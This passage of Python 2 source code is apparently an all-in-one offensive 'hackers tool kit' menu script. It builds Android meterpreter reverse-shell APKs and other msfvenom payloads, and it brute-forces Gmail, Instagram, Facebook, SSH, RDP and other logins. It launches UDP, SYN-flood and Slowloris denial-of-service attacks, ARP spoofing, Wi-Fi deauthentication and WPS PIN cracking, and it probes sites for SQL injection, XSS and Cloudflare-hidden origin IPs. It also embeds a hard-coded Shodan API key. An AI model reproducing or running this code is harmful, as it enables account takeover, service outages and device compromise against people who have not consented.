socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", 